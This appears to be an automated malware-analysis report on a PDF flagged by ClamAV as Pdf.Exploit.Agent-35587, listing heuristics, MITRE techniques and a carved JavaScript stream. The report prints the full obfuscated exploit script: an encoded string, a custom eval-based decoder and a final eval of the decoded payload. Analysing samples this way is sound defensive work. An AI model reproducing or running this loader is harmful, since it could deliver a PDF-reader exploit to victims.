MALICIOUS
286
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1059.007 JavaScript
The PDF file was flagged as malicious by ClamAV with the signature Pdf.Exploit.Agent-35587. Static analysis revealed embedded JavaScript with multiple obfuscated eval() calls, indicating an attempt to hide malicious code execution. The ML classifier also strongly indicated maliciousness. The primary attack pattern involves exploiting vulnerabilities within the PDF reader via JavaScript.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 5
-
ClamAV: Pdf.Exploit.Agent-35587 critical CLAMAV_DETECTIONClamAV detected this file as malware: Pdf.Exploit.Agent-35587
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
var datf = 'qT'+'n'+'fZ1KM7Zoqhl'+'zu'+'f6n'+'fl8P0ah'+'28P0Eg8Lg8P0Eg'+'8Lg8P0'+'E'+'g'+'8Lg8P'+'8dC'+'z'+'GK8P6EgPhK8PCd2R'+'Zg8PVlgWZg8PVlg2'+'gg8PT5CyLg8PT5g8L'+'g8PT5q52K'+'8P'+'Tuy2lg8P'+'C5'+'Cz6K8P'+'C5C5CK8PVdq'+'@qK8P'+'05C8lK8PT5CzCK'+'8P'+'Cl'+'2z'+'CK8PTo'+'gdC'+'K8PZdCKfg'+'8P0dg56'+'g8P'+'ZdCKf'+'g8'+'P'+'CgCza'+'g8PT5C2Lg8PT5CzGK'+'8PCl2z'+'CK8PGKy2Lg8PCgg6O'+'g8PT'+'Kgd2g8'+'P8E22Lg'+'8'+'PT'+'5'+'Cggg8PT5CzCK8P2Kq'+'Kqg8PG'+'KyzG'+'K8PaE26Og8PCg2g'+'gg'+'8P8E2'+'z2g8P'+'T5CgqK8 … -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0013_001.js |
pdf-javascript-stream | PDF /JS object 13 at offset 0x3D5 | 5387 bytes |
SHA-256: cee0c0a6a9408ac56e453f1d6b3cfeb120507921f4b0a05ddea8e9a718d68bdf |
|||
|
Detection
ClamAV:
Pdf.Exploit.Agent-35587
Obfuscation or payload:
likely
Carved artifact contains 6 eval/decoder/string-building token(s). 125 of 191 identifiers look randomly generated (e.g. 'lg8PCl2WCg8PCo2W2K8PC5C2Og8PT5CzCK8PVg2'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var datf = 'qT'+'n'+'fZ1KM7Zoqhl'+'zu'+'f6n'+'fl8P0ah'+'28P0Eg8Lg8P0Eg'+'8Lg8P0'+'E'+'g'+'8Lg8P'+'8dC'+'z'+'GK8P6EgPhK8PCd2R'+'Zg8PVlgWZg8PVlg2'+'gg8PT5CyLg8PT5g8L'+'g8PT5q52K'+'8P'+'Tuy2lg8P'+'C5'+'Cz6K8P'+'C5C5CK8PVdq'+'@qK8P'+'05C8lK8PT5CzCK'+'8P'+'Cl'+'2z'+'CK8PTo'+'gdC'+'K8PZdCKfg'+'8P0dg56'+'g8P'+'ZdCKf'+'g8'+'P'+'CgCza'+'g8PT5C2Lg8PT5CzGK'+'8PCl2z'+'CK8PGKy2Lg8PCgg6O'+'g8PT'+'Kgd2g8'+'P8E22Lg'+'8'+'PT'+'5'+'Cggg8PT5CzCK8P2Kq'+'Kqg8PG'+'KyzG'+'K8PaE26Og8PCg2g'+'gg'+'8P8E2'+'z2g8P'+'T5CgqK8PT5CzCK8P2KqKqg8'+'P'+'G'+'Ky'+'zag8P6Kq6Og8P2'+'lgPq'+'K8P'+'8E2v'+'fK8PT5C2fK8PT5C'+'z'+'CK8P2'+'Kq'+'Kq'+'g8PGKyz6g8P8lg6Og8P8dCvgg8P8E26qK8'+'P'+'T5C'+'yhK8PT5CzCK8P2KqKqg8PGK'+'y5C'+'K8PGgC6O'+'g'+'8P8'+'gqLqg8P8E2POg8PT5CvE'+'g8PT5CzC'+'K8P2K'+'qKqg8P25'+'C5GK8P0'+'o2KqK8PZgqvLK'+'8'+'PCd'+'2glg8'+'PCo2d2K8PTuy2qg8PT'+'5CzT'+'K8PGKg'+'zCK8PZgqKqg'+'8'+'PC'+'l'+'2R'+'GK8PT'+'5q'+'d2K8PTK'+'C6lg'+'8PCl2WCg8PCo2W2K8'+'P'+'8E2WZg8'+'PT5CK'+'fg8PT'+'5CzCK8PVE2WCK8'+'P'+'CK21Zg8P'+'ZdCR8'+'g8Paly'+'2Og8PT5C'+'zCK8PC'+'d2zCK8PCo'+'g'+'d2'+'K8P'+'GgqKfg8PGdCKLK8PCd'+'2WCK8P'+'65'+'Cd'+'2'+'K8P2lg6Og8PT5CzC'+'K8'+'PG5CzCK8P2'+'Kq'+'Kfg8PVg2'+'5GK8P'+'G52z0K8PG'+'KqKfg8P8E2'+'5a'+'g8PT5C6'+'lK8PT5'+'CzC'+'K8P2Kqz6K8PGlyRCK8PGogzCK8P'+'6Kg'+'Lgg8PGly6'+'g'+'K'+'8PT5qdCK8PVgqLOg8PT5CzC'+'K8'+'PZgqgPg8PC'+'l2RCK8PTogd2K8P'+'T'+'KC6lg8PCl2WC'+'g8PCo2W2K8P25'+'C2Og8PT5CzCK8PVg2'+'z'+'CK8PGo'+'2zVg8P2Kqz6K8P0oqRGK8PGoqyfg8P2l'+'gW6K8P65CLgK8PGoqWCK8P2'+'KqKfg8P'+'Vg256g8P'+'G52z'+'2K8PGK'+'qK'+'fg8P8E25ag8PT5CR6K'+'8PT5CzCK8PT5C6lg8P'+'Zg'+'qgPg'+'8PCl2RCK8P'+'To2'+'d2K8PTuC6'+'lg8PCl2WCg8PCo2W2K8PC5C2Og8PT5CzCK8PVg2'+'zCK'+'8P'+'Cl'+'2gPg8P'+'C5Cd2'+'K8PT'+'KC6lg8'+'PCl2W'+'Cg8PC'+'o2W2K8'+'PT5C'+'2Og8P'+'T5Cz'+'CK8P2'+'KCzCK'+'8PGu'+'CW0g8P'+'8'+'gCz'+'6K8P8'+'gCz6K8'+'P8'+'gCz6K'+'8'+'P8gCz6K'+'8P8Eg'+'KLK8PGK2zGK8PCl2W6K'+'8P8lCylg8PGuCgng8P8dCgPg8PCl2W2'+'K8PCl2'+'2Lg8PTo2'+'Lhg8PG5gKfg8P'+'GKyz6g'+'8PZEqKf'+'g'+'8P'+'Cl216g8PCKgL'+'hK8P'+'To'+'qLOg'+'8PGKygLK8PZgyKfg8PTo'+'qRC'+'K'+'8P0oqgLK'+'8P252vqg8P0dgdTK'+'8PGEqz6K8'+'P0oqWZg8P'+'TuggEg8P'+'C5CPgg8'+'P'+'2'+'lC1Tg8PTo2L'+'hK8P'+'Gggvl'+'K8PToqzGg8P2'+'5'+'CgfK'+'8P2gC'+'2fg8P2gg10'+'g'+'8PZg'+'q'+'W2g8PGK22gK8P8l2Kfg8PGK'+'2K'+'fg8PTo'+'qRGK8PV'+'gyy'+'hg8'+'PTogK'+'fg'+'8PCl2d0g'+'8PCogW'+'T'+'g8P6'+'dgz6K8PT5qKfg'+'8PTo'+'qK'+'fg8PG'+'Kgvg'+'K8PGl'+'C'+'WGg8PT5Czag8P2dq2Og8P2lgggg8PG'+'Kq'+'gPg8P2ogW0K8P2ugdGg8PT'+'5Cd2g8Pal2K'+'ng8Palg'+'@fg8PGdCygK8PCEgvqK8PCgyKLK8PCgCKl'+'g8PC'+'g2@fg8P'+'GgC@Lg8P'+'Cg2'+'@Og8'+'PCEgKhg8PClCKq'+'K8PCEgvlK8'+'PC'+'lCKq'+'K8PCl'+'CvlK8PGdC@'+'n'+'g8PCdCKng8'+'Pal2@L'+'g8'+'PC'+'ggvqK8P'+'C'+'lCKfg8PC'+'gCKEg8PCE2vqK8PCd'+'CKlg8PCg2@'+'Lg8Pad2@hg8PCEgK'+'Eg'+'8PaEg'+'K'+'lg'+'8'+'PCEq'+'vqK8PC'+'g'+'gKq'+'K8PC'+'gyKfg8PCE2K'+'lK8'+'PalgvlK8PalgKng8PC'+'gyyqK8P6lCKfg8P6lgygg8'+'PaEgvqg8PCEq@Pg8P6'+'d'+'2yfK8P8l'+'gyEdPOUd'+'TlG'+'fPv2z'+'f09KvPS80y'+'68f2T0'+'@Bl2T2gug'+'dT'+'2T2gugdG2@mqPfv824vr@qQZoFDV0OhhlgmqPfv8TCn11lz8fMg63gMX'+'g4vr@'+'qQZoFD'+'V0O4d'+'8Ts8MA'+'Oc@FRSTufSV08'+'VVy@'+'V8MCT'+'0@v2zf'+'095KCT1uM'+'0fMGfK'+'aCGPC2V8lw6E0OhPlB0VF4ddlgG'+'0'+'0x9dT'+'l'+'GfPFT0gLU1F2qgvv2zf095Ky'+'Tzfy'+'0zlOSV0aPlK1TM'+'uvTu'+'la2nOyO8@mqPfv8Za@PdgS6Q4PGulySKvv2zf'+'095'+'KyTzfy0z'+'lO'+'S'+'V0aPlKv2'+'zf095K'+'CT1uM0fMqfKaC'+'GPC2V8lw'+'6'+'E0OU'+'ET'+'aZ0ufVZa@Pd'+'gS6Q'+'4PGul'+'yS5KCT1uM0fM'+'4f'+'K'+'a'+'CGPC'+'2V8l'+'w6'+'E0GPl'+'sKPlg'+'2Pg@3algv'+'zoO'+'7'+'Tzq26z'+'AhO322hl'+'A'+'wc@TW8nlb9Za@Pdg'+'S6'+'Q'+'4PGuly'+'So@FT'+'0gLU1'+'F2qEyK21lT'+'fKuSZ@FW0lFu0E'+'gvn5fh_8'+'0@'+'82'+'qvGPfLV'+'2@mqVuvVZOo'+'65lV90uF91fKCdghPEywC3qv0'+'3'+'MCeVM'+'BCz2vzggvPlgmLQaRG'+'fa41V'+'u4G1TKhE@4EZs1X'+'0AUZ5q8n'+'508Ldge'+'GV4w'+'C3qv03MCeVMBCz2vd@v'+'3al'+'gv'+'zoO7Tz'+'q'+'2'+'6z'+'A4d8Ts8'+'MAOc'+'@FRXzT'+'lGf'+'P0CKCIZ@vg'+'hgyLEgyLE'+'gyLEg'+'yLEgyLEgyLE'+'ly'+'6nly6nly6nly6nly6nly6nly6nly6nl'+'y6nly6nly6'+'nly6n'+'ly6nl'+'y6nly6nly6nly6nly6nly6nly6nly6nly6'+'nly6nly6nly6nly'+'6nl'+'y6nly6nl'+'y6n'+'ly6nly'+'6nly6nly6nl'+'y6nly6nly6nly6nly6nly6n'+'ly6nly6nly'+'6'+'n'+'ly'+'6n'+'ly6'+'nly6n'+'ly'+'6nly6nly6nly6n'+'ly6nly6nl'+'y6nl'+'y6nly6nl'+'y'+'6nl'+'y6nly6nly'+'6nly6nly6nly6'+'nl'+'y6nly6nly6'+'nly6nly6nly6nly'+'6nly6nly6nly6nly'+'6nly6nly'+'6nly6'+'nly6nly6nly6n'+'l'+'y6nly6n'+'ly6'+'nly6nly6nly'+'6n'+'ly6nly6nly6nly6nly6n'+'ly6n'+'ly6nly6nEyP0PMCSTlv'+'Z'+'1u8C0@BlT2PPlg2q1PCf1CzcK4OUE'; function x5mzpznBG(xgFyQhq){ var tp = '63@31@43@12@48@29@35@1@47@3@0@0@0@0@0@0@44@53@57@55@20@10@52@39@18@17@9@45@34@60@37@50@46@28@24@23@59@2@15@25@27@49@11@0@0@0@0@22@0@51@21@7@26@19@62@42@38@0@4@36@58@32@14@13@33@54@6@56@5@61@41@8@16@40@30'; var nInuGccDPx=0, eiPeTEP60U7W6=xgFyQhq.length, qsaPrNb8Kn=1024, pmFIcCBKcq, eFt1kzWpa8iAW, Q8itvWUhmm='', wxeaoSR4LRoLye=nInuGccDPx, iM7cx=nInuGccDPx, SfYfB3Nyphwn=nInuGccDPx, Gbozf0QTUP=Array(); Gbozf0QTUP = eval("tp"+".s"+"pl"+"it"+"('@')"); for(eval('eFt1kzWpa8iAW=Ma'+'th.'+'ce'+'il(eiPeTEP60U7W6'+'/qsaPrNb8Kn)');eFt1kzWpa8iAW>nInuGccDPx;eFt1kzWpa8iAW--){ for(eval('pmFIcCBKcq=M'+'ath'+'.m'+'in(eiPeTEP60U7W6,'+'qsaPrNb8Kn)');pmFIcCBKcq>nInuGccDPx;pmFIcCBKcq--,eiPeTEP60U7W6--){ eval('SfYfB3Nyphwn|'+'=(Gbozf0QTUP['+'xgFyQhq.'+'cha'+'rCo'+'de'+'At(wxeaoSR4LRoLye+'+'+)-48])<'+'<iM7cx'); if(iM7cx){ eval('Q8itvWUhmm+'+'=S'+'tri'+'ng['+'"fro'+'mCha'+'rCod'+'e"](155^'+'SfYfB3Nyphwn&'+'25'+'5)'); SfYfB3Nyphwn>>=8; iM7cx-=2; } else { iM7cx=6; } } } eval(Q8itvWUhmm); } x5mzpznBG(datf);
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.